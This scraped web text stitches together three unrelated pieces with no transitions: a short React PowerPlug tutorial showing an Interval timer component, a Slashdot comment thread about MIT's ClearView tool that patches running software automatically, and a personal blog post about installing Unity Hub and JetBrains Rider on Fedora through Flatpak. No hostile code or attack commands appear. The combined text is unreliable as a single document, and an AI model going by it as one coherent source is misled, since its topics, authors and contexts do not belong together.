Timers React PowerPlug isn’t just for tracking state variables and user input, you can also use it wire up components to update automatically. Interval Unlike the other components we’ve discussed, Interval doesn’t take an initial state value and instead takes delay (in milliseconds). <Interval delay={1000}> {({ start, stop, toggle }) => ( <div> Updates every second, last updated at:{" "} {new Date().toLocaleTimeString()} <br /><br /> <div> <button onClick={() => stop()}>Stop</button> <button onClick={() => start()}>Start</button> {" or "} <button onClick={() => toggle()}>Toggle!</button> </div> </div> )} </Interval> Conclusion React PowerPlug stands up to the claims that it makes it easy to rapid prototype apps in React. As the project is very much a work in progress right now, I’m super excited to see where the team ends up taking it! I hope that you enjoyed this run down of React PowerPlug and if you are interested in seeing the code samples in action, you can head over to CodeSandbox.
https://alligator.io/react/react-powerplug/
CC-MAIN-2019-35
refinedweb
1,356
51.68
Fixing Bugs, But Bypassing the Source Code timothy posted more than 4 years ago | from the wrapping-puzzles-in-enigmas dept. . I sure wouldn't (5, Funny) Korbeau (913903) | more than 4 years ago | (#29918067) run this software before running ClearView on it first. Imagine what this could do if it had a bug in its code! Re:I sure wouldn't (-1, Troll) Anonymous Coward | more than 4 years ago | (#29918:I sure wouldn't (0) Anonymous Coward | more than 4 years ago | (#29918221) WTF dude. You need to quit crack. Re:I sure wouldn't (1) Sam36 (1065410) | more than 4 years ago | (#29919045) Re:I sure wouldn't (2, Funny) sconeu (64226) | more than 4 years ago | (#29918287) Error - Stack recursion. Head asploding! One might have the question... (0, Interesting) Anonymous Coward | more than 4 years ago | (#29918069) was it ever applied to itself? ... and did it gain conciousness? Re:One might have the question... (1) thhamm (764787) | more than 4 years ago | (#29918981) MS will probably kill it (0, Flamebait) vawarayer (1035638) | more than 4 years ago | (#29918083) Another interesting project that Microsoft will probably buy out and kill in the egg. Re:MS will probably kill it (5, Insightful) SnarfQuest (469614) | more than 4 years ago | (#29918169) If MS included this in Windows, you'd never get to see the login screen because the CPU would be so busy fixing bugs. Yeah, and if it did happen to work (1) transporter_ii (986545) | more than 4 years ago | (#29918319) It would totally wipe out Microsoft's current business model. I think they better wait until they sucker everyone into software rental agreements before this is unleashed on Windows. . Re:Yeah, and if it did happen to work (1) BitZtream (692029) | more than 4 years ago | (#29919733) And how would it do that? You think MS software has every feature for every situation that will ever exist? Its just the bugs that are the problem? Re:MS will probably kill it (1, Insightful) MobileTatsu-NJG (946591) | more than 4 years ago | (#29918429) If MS included this in Windows, you'd never get to see the login screen because the CPU would be so busy fixing bugs. Geez... imagine the sheer volume of .CONF files a Linux user would have to waft through just to get this to check a distro for bugs. Re:MS will probably kill it (0) Anonymous Coward | more than 4 years ago | (#29918747) By installing via a distro customized binary, likely none Re:MS will probably kill it (4, Informative) Xtifr (1323) | more than 4 years ago | (#29919005):MS will probably kill it (5, Funny) mewsenews (251487) | more than 4 years ago | (#29919129):MS will probably kill it (-1, Troll) Anonymous Coward | more than 4 years ago | (#29919139) Just about the funniest thing in the world is when somebody makes a fool of themselves by making a joke about something they clearly don't understand. FYI, I'm laughing at you, not with you. Re:MS will probably kill it (1) westlake (615356) | more than 4 years ago | (#29918923) (3, Insightful) Missing_dc (1074809) | more than 4 years ago | (#29919485) Me-thinks someone sounds jealous they did not think of it first. This really deserves (4, Funny) fuzzyfuzzyfungus (1223518) | more than 4 years ago | (#29918091) How about (4, Insightful) raddan (519638) | more than 4 years ago | (#29918583) Re:How about (1) blueg3 (192743) | more than 4 years ago | (#29918765) The relevance here? Re:How about (4, Interesting) raddan (519638) | more than 4 years ago | (#29919137) Re:How about (3, Insightful) Migala77 (1179151) | more than 4 years ago | (#29919369):How about (0) A nonymous Coward (7548) | more than 4 years ago | (#29919145) The relevance here? Well, none to you. But to people who understand Goedel Escher and Bach, your arrogant ignorance is quite the giggle. Re:How about (1) fuzzyfuzzyfungus (1223518) | more than 4 years ago | (#29918897) ...an immortal, invulnerable program... (4, Funny) John Hasler (414242) | more than 4 years ago | (#29918111) Has anyone cracked "Hello World" yet? Re:...an immortal, invulnerable program... (2, Funny) selven (1556643) | more than 4 years ago | (#29918265) It's not immortal. You want: while 1: print "Hello World" Re:...an immortal, invulnerable program... (1) zapakh (1256518) | more than 4 years ago | (#29918423) while 1: try: while 1: print "Hello World" except KeyboardInterrupt: pass Re:...an immortal, invulnerable program... (1) gzipped_tar (1151931) | more than 4 years ago | (#29919739) Re:...an immortal, invulnerable program... (1) ShakaUVM (157947) | more than 4 years ago | (#29918523) Sorry, but I have prior art on a truly immortal and bug-free program: 10 PRINT "HELLO WORLD" 20 GOTO 10 Let me know who I should contact so MIT can send the royalty checks on my software patent to me. Re:...an immortal, invulnerable program... (1) dgatwood (11270) | more than 4 years ago | (#29918669) You forgot 0 REM Block Control-C 1 ONERR GOTO 10 5 REM Control-Reset reboots 6 POKE 1010,0 Re:...an immortal, invulnerable program... (2, Funny) flaming error (1041742) | more than 4 years ago | (#29918821) These two posts contain the most robust code I've seen all day. But still, "A computer's attention span is no longer than it's power cord." Re:...an immortal, invulnerable program... (2, Funny) brainboyz (114458) | more than 4 years ago | (#29919123) import fusiononachip reference: [xkcd.com] It's interesting, but software should "expire".. (0) skgrey (1412883) | more than 4 years ago | (#29918113) This doesn't support innovation and improvement, and that's the cornerstone of technology improvement. Re:It's interesting, but software should "expire". (4, Funny) Anonymous Coward | more than 4 years ago | (#29918153) This doesn't support innovation and improvement, and that's the cornerstone of technology improvement. Please allow myself to introduce... myself. Re:It's interesting, but software should "expire". (1) skgrey (1412883) | more than 4 years ago | (#29918197) "This doesn't support innovation and improvement, and that's the cornerstone of technology evolution." I'm thinking the gist was there at least.. Re:It's interesting, but software should "expire". (0) Anonymous Coward | more than 4 years ago | (#29918543) Re:It's interesting, but software should "expire". (1) DeadDecoy (877617) | more than 4 years ago | (#29918641) Source doesn't run (1) camperdave (969942) | more than 4 years ago | (#29918117) Re:Source doesn't run (1) Grishnakh (216268) | more than 4 years ago | (#29918331) lot of technology far more advanced than ours) when it's a lot easier to just get a structural engineer to look at the blueprints. Re:Source doesn't run (1) lgw (121541) | more than 4 years ago | (#29918799) difficult problems. For example, you'll never find a compiler bug by just looking at the source code (or more commonly, find that you misunderstood some dark corner of the language spec). Easy bugs tend to be apparant from the source. Hard bugs tend to require careful inspection of the object. Hmm, I guess there's several ways to paint causation over that correlation. Misleading Slashdot summary, as usual (2, Informative) Anonymous Coward | more than 4 years ago | (#29918131) It checks a bunch of identical machines for a set of know bugs, then applies a bunch of predermined patches until one works. That's nice, but not what was promised. Re:Misleading Slashdot summary, as usual (1) geckipede (1261408) | more than 4 years ago | (#29918275) They say this is intended as a method for keeping crap old code going when the original vendors are gone. Odds are, this autopatcher is going to be dealing with stuff the like of which you'd expect to see on thedailywtf. Re:Misleading Slashdot summary, as usual (1, Informative) Meshach (578918) | more than 4 years ago | (#29918457) This is good in preventing an attack or code injection. But as far as bug fixing nothing could be further from the truth. Some developer still needs to look at the assembly generated to identify the bad path taken, find that place in the code, figure out how the program got there, apply a fix, test the fix, then deploy the new application. If anything this is a QA tool for software to avoid attacks. A valuable tool for exposing bugs. Bug as far as actually improving software I do not see it. Re:Misleading Slashdot summary, as usual (1) lgw (121541) | more than 4 years ago | (#29918909) Well, obviously a valuable tool for finding bugs is a valuable tool for improving software. But perhaps not by itself. Re:Misleading Slashdot summary, as usual (0) Meshach (578918) | more than 4 years ago | (#29919121) Well, obviously a valuable tool for finding bugs is a valuable tool for improving software. But perhaps not by itself. You are right. This tool does help developers find bugs. I guess my beef is the claim of the headline that this software will fix bugs and bypass the source code. It does highlight and cut off potential vulnerabilities without accessing the source code. But it does not "fix" anything and may cut off legitimate uses of the software. It just gives you notice and a dirty work around until a real fix can be developed and deployed. Re:Misleading Slashdot summary, as usual (1, Informative) Anonymous Coward | more than 4 years ago | (#29919363) You should re-read the article, and specifically the following passage: "For seven of the attacking team's approaches, ClearView created patches that corrected the underlying errors. In all cases, it discarded corrections that had negative side effects. On average, ClearView came up with a successful patch within about five minutes of its first exposure to an attack." So it does indeed fix bugs, contrary to your claim. Re:Misleading Slashdot summary, as usual (2, Insightful) lgw (121541) | more than 4 years ago | (#29919611) But was it a source patch, or a binary patch? A binary patch is at best a dirty work-around, becuase the bug will keep reappearing in subsequent released of the software (perhaps even in needed patches for other issues). Re:Misleading Slashdot summary, as usual (1, Informative) Anonymous Coward | more than 4 years ago | (#29919203) Either you didn't read the article, or you have a massive reading comprehension problem. Clearview actually creates patches to fix problems that it identifies. Note the following passage from the article: "For seven of the attacking team's approaches, ClearView created patches that corrected the underlying errors. In all cases, it discarded corrections that had negative side effects. On average, ClearView came up with a successful patch within about five minutes of its first exposure to an attack." 2012 (0) Frosty Piss (770223) | more than 4 years ago | (#29918159) Why owuld you need to access the source (1) geekoid (135745) | more than 4 years ago | (#29918175) code. I would argue that would be the worst way to do it. Look at the hex, make changes. The conept is no different then inserting or replacing a JMP to get around software protection. Re:Why owuld you need to access the source (1) Miandrital (1029138) | more than 4 years ago | (#29918281)... Re:Why owuld you need to access the source (2, Interesting) stephanruby (542433) | more than 4 years ago | (#29918625)). If humans did the same..! (4, Funny) Odinlake (1057938) | more than 4 years ago | (#29918185):If humans did the same..! (1) Xtravar (725372) | more than 4 years ago | (#29918529) THIS IS UNNATURAL HERESY!!!! You've convinced me. We need to destroy this program and replace it with one that makes judgments based on feelings. Who will police the police? (2, Interesting) ashanin (1367775) | more than 4 years ago | (#29918187) DNA? (1) ShadowXOmega (808299) | more than 4 years ago | (#29918199) - self repairing - self replicating - survive large amounts of time with minor changes clearview (3, Insightful) wizardforce (1005805) | more than 4 years ago | (#29918219) (5, Funny) Anonymous Coward | more than 4 years ago | (#29918327) So run two. Re:clearview (0) Anonymous Coward | more than 4 years ago | (#29918503) But you first have to buy two licenses. Re:clearview (0) owlstead (636356) | more than 4 years ago | (#29918703) Because Clearview was created by a bunch of people that know what they are doing. Because Clearview is likely to be a much smaller target than the monitored software packages. Because Clearview is not directly connected to the web. Because Clearview may not even be easily detectable. Re:clearview (1) wizardforce (1005805) | more than 4 years ago | (#29919265) That is no deterrent. Many programs are made by reasonably intelligent people who "know what they're doing" software is complex, especially for something like this. Why? Antivirus programs serve a very similar function and yet they are under attack all the time. neither are other programs that have exploitable flaws. You could say the same for other programs. It's naive to believe that Clearview is a magic bullet here, every program has flaws and a flaw in this program could prove disastrous. Re:clearview (3, Insightful) BitZtream (692029) | more than 4 years ago | (#29919769). Did they use that tool to develop that tool? (5, Interesting) 140Mandak262Jamuna (970587) | more than 4 years ago | (#29918311) I wonder if we should turn that software loose on itself and see what it finds. Re:Did they use that tool to develop that tool? (5, Insightful) Wonko the Sane (25252) | more than 4 years ago | (#29918795) Fiendish? What could possibly be more fair and objective than making him eat his own dogfood? Re:Did they use that tool to develop that tool? (2, Insightful) mattack2 (1165421) | more than 4 years ago | (#29918885) "Fiendish" prof? If this is even a true story, it rates a "duhh!" Of course he should have ran his analyzer on his own code.. Re:Did they use that tool to develop that tool? (4, Insightful) KillerBob (217953) | more than 4 years ago | (#29919079) Either that or put in an author check that automatically spits out an A+ if it detects that the author of the code was himself.... Masters? (0) Anonymous Coward | more than 4 years ago | (#29918935) This type of stuff, like your friend did, has been written since the 1960s. It doesn't really work, unless the input code is written by slackers or idiots. I'm fairly certain I've seen this type of code written in a few lines of perl. A programmer with skill will KNOW how to write maintainable, readable, reusable code and simply do it. If fact, when pressured to not follow best practices, I suspect he will call in sick a few days to "help" management come to their senses. If someone actually earned a masters from this, that graduate program should be laughed out of existence. OR, you are explaining it very well. thesis grade? (2, Insightful) pigwiggle (882643) | more than 4 years ago | (#29919589) Hmmm. Sounds like some CS urban legend. Never heard - not once - of a "thesis grade". Pass, no-pass, conditional pass. I didn't receive a grade myself. Just a diploma. Be great for those kind of folks that put GPA's on their CV, though. Re:Did they use that tool to develop that tool? (1) goodmanj (234846) | more than 4 years ago | (#29919747) Great story, but [Citation needed]. Obviously Linux developers aren't human ;-) (2, Interesting) Zero__Kelvin (151819) | more than 4 years ago | (#29918313) This is absolutely correct, so long as one assumes that Windows systems are the only systems, and Linux developers aren't human. Re:Obviously Linux developers aren't human ;-) (0) Anonymous Coward | more than 4 years ago | (#29918571) This is absolutely correct, so long as one assumes that Windows systems are the only systems, and Linux developers aren't human. If we assume windows systems are the only ones, Linux doesn't enter in the equation, so Linux developers don't need to not be human for the assumption that windows systems are the only ones. Did you get it? Microsoft will never buy it (-1, Redundant) Zero__Kelvin (151819) | more than 4 years ago | (#29918349) So Microsoft won't be using it then ... Re:Microsoft will never buy it (1, Funny) Anonymous Coward | more than 4 years ago | (#29918677) So Microsoft won't be using it then ... More like... (user to IT): When I left last night, I had Word open in Windows on this PC... when I came back this morning, the document open in GVim in Linux! DMCA? (0, Offtopic) happyslayer (750738) | more than 4 years ago | (#29918373).... Re:DMCA? (1) happyslayer (750738) | more than 4 years ago | (#29919327)... Yeah right... (0) Anonymous Coward | more than 4 years ago | (#29918387) "Keeping the system going at all costs does seem to have merit," adds David Pearce, a senior lecturer in computer science at Victoria University in Wellington, New Zealand. At all costs? What sort of systems does he imagine this would be useful for? Flight control computers? Industrial robots? Nuclear reactor control systems? Radiation therapy machines? Or just systems where people's lives aren't potentially in jeopardy when "Keeping the system going at all costs" results in the system going haywire? When certain systems have something go wrong and end up in an unanticipated state, the thing you want to do is reset them to a known state, not just keep them going in hopes the software can get things under control. Fuck3r (-1, Offtopic) Anonymous Coward | more than 4 years ago | (#29918401) No Silver Bullet (2, Insightful) gweihir (88907) | more than 4 years ago | (#29918487):No Silver Bullet (2, Informative) Yold (473518) | more than 4 years ago | (#29918559) I'd also point out, that from an Automata Theory standpoint, "The task of software verification is not solvable by a computer" (MIT's own Sipser). Re:No Silver Bullet (2) cameigons (1617181) | more than 4 years ago | (#29918867) Re:No Silver Bullet (1) FlyingBishop (1293238) | more than 4 years ago | (#29918659) Unless they've solved strong AI and plan to just sit in and have the AI write perfect software for them so they can rake in the licensing fees until someone else figures it out. Sensationalism ruined it for me (4, Insightful) billcopc (196330) | more than 4 years ago | (#29918493) When a potentially harmful vulnerability is discovered in a piece of software, it takes nearly a month on average for human engineers to come up with a fix and to push the fix out to affected systems Yes. It takes us 5 seconds to an hour to actually come up with the fix, the remainder of the month is spent in bureaucratic hell - sitting in a trouble ticket queue, sitting in a verification queue, sitting in a QA manager's inbox, sitting with the communications team. Clearview, if it does what it says on the tin, only addresses the 5 second problem. Any "sane" dev shop would still run the resultant patch through the many cogs and loops of modern software management. You won't get your hole patched any quicker, you'll just have shifted the coders' attention away from your own app's bugs, and onto Clearview's bugs. Net gain: less than zero. Theoretically and conceptually, it's an interesting tool (you know, like Intercal). It just doesn't really fit in the industry, IMHO. Re:Sensationalism ruined it for me (1) starrsoft (745524) | more than 4 years ago | (#29919147) You're missing the point. This isn't aimed at developers, it's aimed at end users. Good idea... (1) Thelasko (1196535) | more than 4 years ago | (#29918533) Next step: CPUs that do this (0) Anonymous Coward | more than 4 years ago | (#29918561) I want my CPU to say, "oh, these are the instructions you meant to execute..." (Granted, I'd bet there are optimizations present in CPUs that do this today, but they're not supposed to introduce changes in behavior.) Uh oh... (1) Taur0 (1634625) | more than 4 years ago | (#29918653) Re:Uh oh... (1) garompeta (1068578) | more than 4 years ago | (#29919279) sensasionalists ? (4, Informative) cameigons (1617181) | more than 4 years ago | (#29918749) This is complete junk (0) Anonymous Coward | more than 4 years ago | (#29919003) This is completely useless for any real application and for any complicated bugs. I've dealt with this for many many years. It sounds good in theory, but it simply doesn't work in the real world. Wondering if it can be gamed (1) shoor (33382) | more than 4 years ago | (#29919117) Be skeptical (2, Interesting) Anonymous Coward | more than 4 years ago | (#29919227). Ridiculous! (1) Ancient_Hacker (751168) | more than 4 years ago | (#29919237):Ridiculous! (1) DarkOx (621550) | more than 4 years ago | (#29919687) inserted. Now this certainly may change the actually function of the application but possibly not in a way the users will notice or care about! oh, I've seen this before somewhere (1) roman_mir (125474) | more than 4 years ago | (#29919273) From TFA:. reminded me of another ingenious software application:. ... ... The first matrix I designed was quite naturally perfect, it was a work of art, flawless, sublime. A triumph equaled only by its monumental failure.. So, the solution to any program failure is creation of Zion, (the rest of the idea here is left to the imagination of the reader.) Virus Scanner (1) allcoolnameswheretak (1102727) | more than 4 years ago | (#29919287) Sounds just like the way your everyday virus scanner works. Martin Rinard a prof? (1) McNihil (612243) | more than 4 years ago | (#29919317)'s_theorem [wikipedia.org] Can I get my star now? People this is what we get when people grow up with Windows. Well... (0) Anonymous Coward | more than 4 years ago | (#29919381) Isn't this already done with the "Hello World" program? But seriously all software depends on hardware, you would really amaze me if you had a contiguous area of current that kept on fixing itself No good. (0) Anonymous Coward | more than 4 years ago | (#29919627) It rates far too high on the thisAlgorithmBecomingSkynet [xkcd.com] index. Yea, cause this hasn't been tried before ... (1) BitZtream (692029) | more than 4 years ago | (#29919681) system. 'find a potential patch' ? I have that, its the 'Check for updates' button. Yes I realize that its trying to detect runtime errors and correct those, but anyone with half a clue about CS knows multiple reasons why this simply doesn't work. The first and foremost reason being that it will take something intentional, classify it as a bug and 'fix' it. In effect breaking it. The only way to fix this is to keep a big exception list that constantly needs updated ... which will also have bugs. Rinse, repeat for the rest of eternity.
http://beta.slashdot.org/story/126579
CC-MAIN-2014-15
refinedweb
3,759
70.94
Stop Watch using Windows Phone From Nokia Developer Wiki This article explains how to create stop watch in Windows Phone. It extends the article: Implement Timer control in Windows Phone. Article Metadata Code Example Source file: Media:StopWatch.zipTested with Devices(s): Windows Phone EmulatorCompatibility Platform(s): Windows Phone 7.5, 8Article Windows Phone 8 Windows Phone 7.5 Windows Phone 8 Windows Phone 7.5 Keywords: DispatcherTimer , Stop watch Created: girishpadia (13 Oct 2011) Last edited: hamishwillee (02 Jul 2013) Introduction This code example creates a simple stop watch which you can start and stop using the buttons Start Clock and Stop respectively. The example uses DispatcherTimer to update the stopwatch every second and lists how long the timer ran (calculated from current DateTime when the buttons are pressed). Implementation - Create a new "Silverlight" project using C# and name the project as "StopWatch". - Drag one textblock from the toolbox and name it txtClock - Drag two buttons and place them just below the txtClock as shown in the application image below. Name the buttons btnStart and btnStop respectively. - In the XAML file, add the event handlers for the newly created buttons by adding the attributein the btnStart tag and Click="btnStart_Click"in the btnStop tag. Alternatively, just double click both buttons in the layout view. Click="btnStop_Click" - Drag another textblock and name it lblTimer and place it below the buttons. - Copy and paste following code into your application. using System; using Microsoft.Phone.Controls; using System.Windows.Threading; namespace StopWatch { public partial class MainPage : PhoneApplicationPage { // Constructor DateTime lastTime,startTime; public MainPage() { InitializeComponent(); } void OnTimerTick(Object sender, EventArgs args) { txtClock.Text = DateTime.Now.ToString(); } private void btnStart_Click(object sender, System.Windows.RoutedEventArgs e) { DispatcherTimer newTimer = new DispatcherTimer(); newTimer.Interval = TimeSpan.FromSeconds(1); newTimer.Tick += OnTimerTick; newTimer.Start(); lastTime = DateTime.Now; startTime = DateTime.Now; lblTimer.Text = "Start time : " + lastTime.ToString() + "\n"; } private void btnStop_Click(object sender, System.Windows.RoutedEventArgs e) { DateTime endTime = DateTime.Now; TimeSpan span = endTime.Subtract(startTime); lblTimer.Text += "Seconds from begining: "+span.TotalSeconds.ToString()+"\n"; span = endTime.Subtract(lastTime); lblTimer.Text += "Seconds from last stop: " + span.TotalSeconds.ToString() + "\n\n"; lastTime = DateTime.Now; } } } Tested On The application is tested on Windows Phone Emulator. Hamishwillee - I've subeditedI've subedited and updated this - adding links to the DispatcherTimer. One question, why this type of timer, and not one of the others? hamishwillee 07:42, 27 April 2012 (EEST) Mihasi - Metadata update neededI've made some changes to the code, so the metadata should be updated. Not sure how to do this, new to Windows Phone and this wiki. Mihasi 13:34, 8 July 2012 (EEST) Hamishwillee - @Mihasi - thank you Hi Mihasi Welcome to the wiki. Your profile is not public so can't find anything about you - are you community or Nokia internal? Thanks for the change to code - they look good. In terms of the metadata the usage is documented in Template:ArticleMetaData. In general what we're trying to do with most of the metadata is indicate the likely "relevance" of the content so that down the track people can tell if its likely still to be useful and accurate over time - so we show review timestamps for articles if they are still relevant after a year or so. We add update stamps if we make big changes (effectively we're "renewing" the creation date). We add devices and platforms that the article has been tested on as they come along. Upshot is that if someone sees an article with new SDKs, devices and stamps they know its relevant. If its older ones, they know that its not as "trustable". In this case You wouldn't update SDK or platform information, because that is still current. Hope that makes sense. Thanks again for this - every little bit helps. regardsHamish hamishwillee 10:06, 10 July 2012 (EEST)
http://developer.nokia.com/community/wiki/Stop_Watch_using_Windows_Phone
CC-MAIN-2014-41
refinedweb
638
59.5
Odoo Help Odoo is the world's easiest all-in-one management software. It includes hundreds of business apps: CRM | e-Commerce | Accounting | Inventory | PoS | Project management | MRP | etc. URL and routing in Building Website Hi, Plz anyone can give me the clear idea regarding URL and routing in building website, I got really confused........ Hello Umashankar Below is some information for website routing in odoo Example : website_sale/templates.xml line 643 <template id="cart" name="Shopping Cart"> So, this is the template id and the page will be localhost/shop/cart Now, when you redirect to this page it will trigger the method of that page : website_sale/controller.main.py line 295 @http.route(['/shop/cart'], type='http', auth="public", website=True) def cart(self, **post): By the http.route you can route trigger the method of some perticuler page. Hope that this answer will help you. Please don't hesitate to ask any question regarding this. If you get the answer as you need then please accept the answer. Thank You Thanks for the reply Kazim Mirza, but still i have doubts in some concepts, you have given just the overview plz refer this page, Thanks in advance Kazim Mirza I know the tuts but you just wanted to know routing so i have gave you an idea about it I know the tuts but you just wanted to know routing so i have gave you an idea about it. so what you want to know? I dont get the concept of adding the model name in the URL path , plz give some idea Karim..... About This Community Odoo Training Center Access to our E-learning platform and experience all Odoo Apps through learning videos, exercises and Quizz.Test it now
https://www.odoo.com/forum/help-1/question/url-and-routing-in-building-website-72474
CC-MAIN-2017-30
refinedweb
293
71.34
JQuery :: Get Video Path During Drag And Drop?Dec 23, 2010 I want to perform drag and drop operation on video file ,in which i want to make video carosual for all video and drag the video to the main player and play on main player.View 2 Replies I want to perform drag and drop operation on video file ,in which i want to make video carosual for all video and drag the video to the main player and play on main player.View].... My scenario is to drag an item from a repeater/datalist to another repeater(preview repeater). The preview repeater already contains some icons in some positon(for eg. in 1st and 4th items). I need to insert the icon to empty positions(2nd, 3rd and 5th items) in preview repeater.View 4 Replies I hav two listboxes, how can i drag and drop between these two using jqueryView 4 Replies. his function takes an li element and adds it to another ul element. After this code is fired the jquery events attached to the children spans of the li element do not fire the first time they are clicked.View 2 Replies I want to make content switch say there are 3 items.. Item 1, Item2, Item3 in datalist and if i drag Item 1 to item 3, the content will interchange..."item 3" will go to "item 1" and "item 1" to "item 3" What code do i write in drop function. Here is my code. Is this even possible? Default.aspx <link href="" rel="stylesheet" type="text/css"/> <script src=""></script> <script src=""></script>[code].... implementing a drag and drop feature into my website. I was wondering if anyone has any good examples on how this can be done?View 3 Replies I need to develope interface something like IGoogle with drag and drop of boxes in ASP.Net 2.0. The interface should support cross browser compatibility.View 1 Replies I would like to ask we select a file in our system and drag that file into browser, drop that file into particular location of the browser at that time the file is to upload.View 4 Replies We have an asp.net treeview control and a texarea. The childnodes of treeview need to be draggable and can be dropped into txtarea.View 2 Replies I need to change the cell postions of the gridview via drag and drop.View 1 Replies] .... I have a linkbutton whose onclick method does not fire after a jquery drag and drop, the onlclientclick does work. Y would the server side code not work only after a jquery drag and drop?View 4 Replies I wanna save the order of my list to the sql server database in jquery drag & drop using asp.net c#. How can I do this?View 1 Replies I have 2two gridview .If i have load same data from two gridvie after that i drap and drop one ID one grid to another grid that time ID same means it will show alert match or it will show not match alert using jquery.View 1 Replies When I Drag and Drop the gridview row record then update preference will be enable the Button(update preference). Otherwise it will be disable.. Please refer this link: [URL] .... I want to implement some drag and drop behaviors in my ASP.NET app. Could someone point me in the right direction for some articles and samples? For example, one example of drag and drop I want to implement is for sorting things.View 4 Replies I currently have two listboxes and I use arrow buttons to move items from one list to another. Is there a way I could implement drag and dropping between those 2 listboxes.View 3 Replies i've built a WPF application with two listBoxes.I managed to drag and drop elements from one listbox to the other, but it always gets added to the end/buttom of the second listbox.How can i drag and drop the element and place it in the other listbox, but where i want it to be, where the cursor is located/ponits and not in the end (as the last element).View 1 Replies In WPF I have a textBox . I need to drag and drop textfiles ie in notepad from desk top to textbox of wpf. I managed to get the contents of notepad to textbox. But I need file path to be in browser so that I can transfer files from client to client. I need the file path instead. privatevoid textBox1_PreviewDragEnter(object sender, DragEventArgse) { bool isCorrect = true; if (e.Data.GetDataPresent(DataFormats.FileDrop, true) == true ) { string[] filenames = (string[])e.Data.GetData(DataFormats.FileDrop, true ); [Code] .... Anyone who can give me a tip on articles explaining how I can implement a drag n drop functionality between two asp controls? I'm using Asp.net 3.5.View 1 Replies I cannot get the Drag and Drop functionality of Web Parts is to work. I have a very simple test page with two WebPartZones.. In the OnInit method of the code behind I put the page in design mode. In the first zone I have a textbox.At runtime the text box renders as a web part. When I hover over the web part header my mouse pointer changes the 'move' pointer, but I cannot drag the item. I do not see it dragging and the part never moved. I am using Visual Studio 2010 with IE 8. I have tried IE8 in compatibility mode and regular mode. The results are the same. Here is the markup from my test page: <form id="form1" runat="server"> <div> <asp:WebPartManager </asp:WebPartManager> <asp:WebPartZone <ZoneTemplate> <asp:TextBox </ZoneTemplate> </asp:WebPartZone> aa <asp:WebPartZone </asp:WebPartZone> aa <asp:EditorZone </asp:EditorZone> </div> </form> Here is the code behind: protected override void OnInit(EventArgs e) { base.OnInit(e); WebPartManager mgr = WebPartManager.GetCurrentWebPartManager(this); mgr.DisplayMode = WebPartManager.DesignDisplayMode; } What am I missing? I have to generate an organization chart, in my asp.net application and it should supports drag and drop feature to update the linkage between organization structure. What would be the best way to deal with it, (jQuery or silver light or .net chart controls). My primary needs is to support drag and drop.View 4 Replies I have a listview showing images like ImageViewer and I want to implement Drag-Drop behavior within ListView. how can i achieve the Srag-Drop inside the below kind of customized ListView. <asp:ListView <LayoutTemplate> <table id="groupPlaceholderContainer" runat="server" border="1"> <tr id="groupPlaceholder" runat="server"> </tr> </table> </LayoutTemplate> <ItemTemplate> <td id="Td4" align="center" style="background-color: #eeeeee;"> <asp:Image <br /> <asp:Label </td> </ItemTemplate> <GroupTemplate> <tr id="itemPlaceholderContainer" runat="server"> <td id="itemPlaceholder" runat="server"> </td> </tr> </GroupTemplate> <InsertItemTemplate> <td id="Td3" width="150px" height="150px" runat="server" align="center" style="background-color: #e8e8e8; color: #333333;"> <asp:FileUpload </td> </InsertItemTemplate> </asp:ListView> Code Behind: public class ImageEntity { public string PhotoName { get; set; } public int PhotoIndex { get; set; } public string PhotoURL { get; set; } } public partial class _Default : System.Web.UI.Page { protected void Page_Load(object sender, EventArgs e) { IList<ImageEntity> imagesList = new List<ImageEntity>() { new ImageEntity(){ PhotoName="House1", PhotoIndex=1, PhotoURL= @"ImagesHouse-01.JPG" }, new ImageEntity(){ PhotoName="House2", PhotoIndex=2, PhotoURL= @"ImagesHouse-05.JPG" }, new ImageEntity(){ PhotoName="House3", PhotoIndex=3, PhotoURL= @"Imageshouse.jpg" }, new ImageEntity(){ PhotoName="House4", PhotoIndex=4, PhotoURL= @"Imageshouse2.jpg" } }; lvPhotoViewer.DataSource = imagesList; lvPhotoViewer.DataBind(); } }
http://asp.net.bigresource.com/JQuery-Get-Video-Path-during-drag-and-drop--RZwDdPvWA.html
CC-MAIN-2018-39
refinedweb
1,251
65.42
As you recall from the previous blog post, I’d installed Unity and JetBrains on my Fedora 32 computer via Flatpaks. I was going to use them for the Unity Multiplayer course I was taking on Udemy. Unfortunately it was an immediate fail and in lesson one after they have me install a new inputs library and restart Unity, it would always crash upon loading the file. I’m currently installing Unity 2020.1 on my Windows computer where I don’t expect to have that issue. Assuming I don’t, then it’s a big fat nope on using Unity on Fedora via Flatpak (at least for this class). Which, to be fair, is not on their supported OS list – which is only Ubuntu and CentOS 7. (And the latter for movie-making) Unity and JetBrains Rider on Fedora via Flathub As I mentioned last year in my 2019 in Programming post, I created a bunch of 2D games in Unity by following along with the Gamedev.tv classes. I would watch the videos on Linux and jump over to my Windows computer for the programming, learning how to use SourceTree and Microsoft Video Studio in the process. But for some reason, going back and forth with the KVM when running Unity would sometimes freeze up the Windows computer. So when I saw someone on Fedora Planet running Unity Hub, I thought I’d see if there was a Flatpak – and there IS! Also, I’ve fallen in love with JetBrain’s Pycharm, so I thought I’d go ahead and use their game dev IDE, Rider. (There’s a Flatpak for that, too!) So, let’s see how well this works! Apparently if you go this route, you have to handle licensing first. Just clicked on manual activation. That led me to login to Unity.com with my already-extant Unity creds. After answering some questions about how much money I make with Unity, they gave me a license file that I attached to Unity hub. Then I went to the General section on the left there to tell it where to install Unity versions. Once that was done, the hub more or less looked like I remembered it on Windows. I already knew, from my previous forays, that I would need to add a Unity install, so it was off to the Installs section. This is what the selection looked like: I don’t know if this is how it is on Windows now, too, since it’s been a long time since I worked in Unity. But, having found myself with a new version of Unity every time I signed in – I’m glad they have LTS versions, now. The CentOS of Unity, if you will. I went and checked the next course I want to do, GameDev.tv’s Unity Multiplayer class (here on Udemy and here on Gamedev.tv), and they want 2020.1. So I’ll install that version. For some reason, it wouldn’t let me download that version – it complained it would take up too much space (even though I have 900ish GB free and it said it would take up 10GB). But it decided it could install the LTS version. So, in the interest of seeing if it could open and run the games I’d previously developed, I just went with the LTS version for now. It quit out and complained about a corrupted download. But I don’t know where it was downloading to, because nothing was in the folder I told it to download to. If it is downloading somewhere else first, like /tmp – maybe that would explain the issues. Eventually I tell it not to do any runtimes and I keep trying to install a bunch of times. Like a reverse Murphy’s law – as soon as I start posting about the problem on the /r/unity3D subreddit it starts working. Despite my inability to install Unity 2020 over two days (edit: after literally 10 tries, restarting Unity Hub and restarting my computer, I finally got Unity 2020 to install), at least it ran my code from last year’s class ok, including upgrading it to the LTS version (which came out after I last worked on it). When I hit play it also ran reasonably well – didn’t seem to be 